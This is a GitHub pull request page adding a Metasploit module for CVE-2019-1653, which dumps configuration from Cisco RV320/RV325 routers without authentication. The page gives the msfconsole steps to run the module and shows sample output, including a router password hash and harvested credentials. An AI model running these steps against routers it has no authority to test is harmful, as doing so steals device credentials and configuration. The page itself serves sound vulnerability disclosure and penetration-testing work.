New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Module to dump configuration of the Cisco RV320/RV325 #11366

Merged
merged 17 commits into from Feb 7, 2019

Conversation

Projects
None yet
5 participants
@asoto-r7
Copy link
Contributor

asoto-r7 commented Feb 6, 2019

CVE-2019-1653 (aka Cisco Bugtracker ID CSCvg85922) is an unauthenticated disclosure of device configuration information for the Cisco RV320/RV325 small business router. The vulnerability was responsibly disclosed by RedTeam Pentesting GmbH.

An exposed remote administration interface would allow an attacker to retrieve password hashes and other sensitive device configuration information. On versions 1.4.2.15 and 1.4.2.17, port :443 is accessible on the LAN, and if remote administration is enabled, also on the WAN interface.

In addition, version 1.4.2.15 listens on the WAN interface on TCP port 8007 by default. Version 1.4.2.17 does not listen on port 8007.

Context is available from our recent blog post.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use auxiliary/gather/cisco/cisco_rv320_config
  • set RHOSTS 192.168.1.1 (default LAN IP) or to the WAN interface
  • run
  • Confirm the following output is similar to:
[+] Stored configuration (128628 bytes) to /home/administrator/.msf4/loot/20190206165015_default_192.168.1.1_cisco.rv.config_434637.txt
  • Confirm that the hosts, creds, and loot command return the collected information correctly.
  • Confirm that the cited file contains approximately 128k of ASCII text, for example:
####sysconfig####
[VERSION]
VERSION=73
MODEL=RV320
SSL=0
IPSEC=0
PPTP=0
PLATFORMCODE=RV0XX
VENDORCODE=ls
  [ ... snip ... ]
password $1$mldcsfp$gCrnS7A0ta6E5EzwDiZ9t/
user-group Default
timeout 10
user-type admin
expiry-date 
ui-theme default
block-login false
block-wan-login false
admit-using-clientcert false
admit-address false
admit-useragent false
exit
end
####end####
@asoto-r7

This comment has been minimized.

Copy link
Contributor Author

asoto-r7 commented Feb 6, 2019

Also works on 1.4.21.15:

msf5 auxiliary(gather/cisco/cisco_rv320_config) > run

[+] Stored configuration (128628 bytes) to /home/administrator/.msf4/loot/20190206174849_default_192.168.1.1_cisco.rv.config_426861.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
@asoto-r7

This comment has been minimized.

Copy link
Contributor Author

asoto-r7 commented Feb 7, 2019

I've added database functionality:

msf5 auxiliary(gather/cisco/cisco_rv320_config) > hosts

Hosts
=====

address      mac                name          os_name  os_flavor  os_sp  purpose  info  comments
-------      ---                ----          -------  ---------  -----  -------  ----  --------
192.168.1.1  70:E4:22:94:E7:20  router94e720                                            

msf5 auxiliary(gather/cisco/cisco_rv320_config) > creds
Credentials
===========

host         origin       service          public  private                            realm  private_type
----         ------       -------          ------  -------                            -----  ------------
192.168.1.1  192.168.1.1  443/tcp (https)  cisco   $1$mldcsfp$gCrnS7A0ta6E5EzwDiZ9t/         Nonreplayable hash

msf5 auxiliary(gather/cisco/cisco_rv320_config) > loot

Loot
====

host         service  type             name  content     info  path
----         -------  ----             ----  -------     ----  ----
192.168.1.1           cisco.rv.config        text/plain        /home/administrator/.msf4/loot/20190206174849_default_192.168.1.1_cisco.rv.config_426861.txt

To save you the trouble of cracking my password hash, it's cisco. :-P

asoto-r7 added some commits Feb 7, 2019

@asoto-r7

This comment has been minimized.

Copy link
Contributor Author

asoto-r7 commented Feb 7, 2019

Firmware version 1.4.2.15 listens on tcp/8007 via the WAN port. The module has been tested against that setup and works!

asoto-r7 added some commits Feb 7, 2019

@asoto-r7 asoto-r7 added docs and removed needs-docs labels Feb 7, 2019

asoto-r7 added some commits Feb 7, 2019

@wvu-r7 wvu-r7 self-assigned this Feb 7, 2019

asoto-r7 added some commits Feb 7, 2019

asoto-r7 added some commits Feb 7, 2019

@asoto-r7 asoto-r7 removed the delayed label Feb 7, 2019

@asoto-r7

This comment has been minimized.

Copy link
Contributor Author

asoto-r7 commented Feb 7, 2019

Thanks to @bcoles, @h00die, and especially @wvu-r7 for the exhaustive code review. 😄

@wvu-r7 wvu-r7 merged commit 0f3a2c1 into rapid7:master Feb 7, 2019

1 of 3 checks passed

Metasploit Automation - Sanity Test Execution Build triggered for merge commit.
Details
continuous-integration/travis-ci/pr The Travis CI build is in progress
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details

wvu-r7 added a commit that referenced this pull request Feb 7, 2019

@wvu-r7

This comment has been minimized.

Copy link
Contributor

wvu-r7 commented Feb 7, 2019

Release Notes

The auxiliary/gather/cisco_rv320_config module has been added to the framework. This module can be used to dump the configuration from vulnerable Cisco RV320/RV325 routers.

@asoto-r7 asoto-r7 deleted the asoto-r7:cisco-rv320-config branch Feb 7, 2019

jmartin-r7 added a commit that referenced this pull request Feb 7, 2019

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment